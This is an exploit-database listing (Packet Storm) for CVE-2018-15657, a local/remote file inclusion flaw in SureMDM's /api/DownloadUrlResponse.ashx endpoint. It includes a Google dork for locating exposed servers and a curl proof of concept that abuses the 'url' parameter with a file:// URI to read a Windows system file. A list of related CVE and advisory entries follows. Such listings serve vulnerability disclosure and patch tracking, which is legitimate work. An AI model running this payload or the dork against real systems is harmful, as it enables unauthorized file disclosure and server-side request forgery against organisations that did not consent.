Lucene search
Digital InterruptionPACKETSTORM:151469HistoryFeb 02, 2019 - 12:00 a.m.
SureMDM Local / Remote File Inclusion
2019-02-0200:00:00
Digital Interruption
packetstormsecurity.com
275
EPSS
0.001
Percentile
36.0%
`# Exploit Title: SureMDM LFI/RFI (Prior to 2018-11 Patch)
# Google Dork: inurl:/api/DownloadUrlResponse.ashx
# Date: 2019-02-01
# Exploit Author: Digital Interruption
# Vendor Homepage: https://www.42gears.com/
# Software Link: https://www.42gears.com/products/suremdm-home/
# Version: Versions prior to the November 2018 patch
# Tested on: Windows
# CVE : CVE-2018-15657
An attacker can force the web server to request remote files and display the output by placing any arbitrary URL in the "url" parameter of /api/DownloadUrlResponse.ashx. This can also be utilised to request files from the local file system by using the file:// URI syntax, such as file://C:/WINDOWS/System32/drivers/etc/hosts
Proof of concept: curl -H "ApiKey: apiKey" http://target/api/DownloadUrlResponse.ashx?url=file://C:/WINDOWS/System32/drivers/etc/hosts
`
Related
exploitpack
exploitpack
SureMDM 2018-11 Patch - Local Remote File Inclusion
2019-02-01 00:00:00
dsquare
dsquare
SureMDM File Disclosure
2019-02-20 00:00:00
cvelist
cvelist
CVE-2018-15657
2019-02-05 03:00:00
exploitdb
exploitdb
SureMDM < 2018-11 Patch - Local / Remote File Inclusion
2019-02-01 00:00:00
zdt
zdt
SureMDM < 2018-11 Patch - Local / Remote File Inclusion Vulnerability
2019-02-01 00:00:00
prion
prion
Server side request forgery (ssrf)
2019-02-05 03:29:00
nvd
nvd
CVE-2018-15657
2019-02-05 03:29:00
cve
cve
CVE-2018-15657
2019-02-05 03:29:00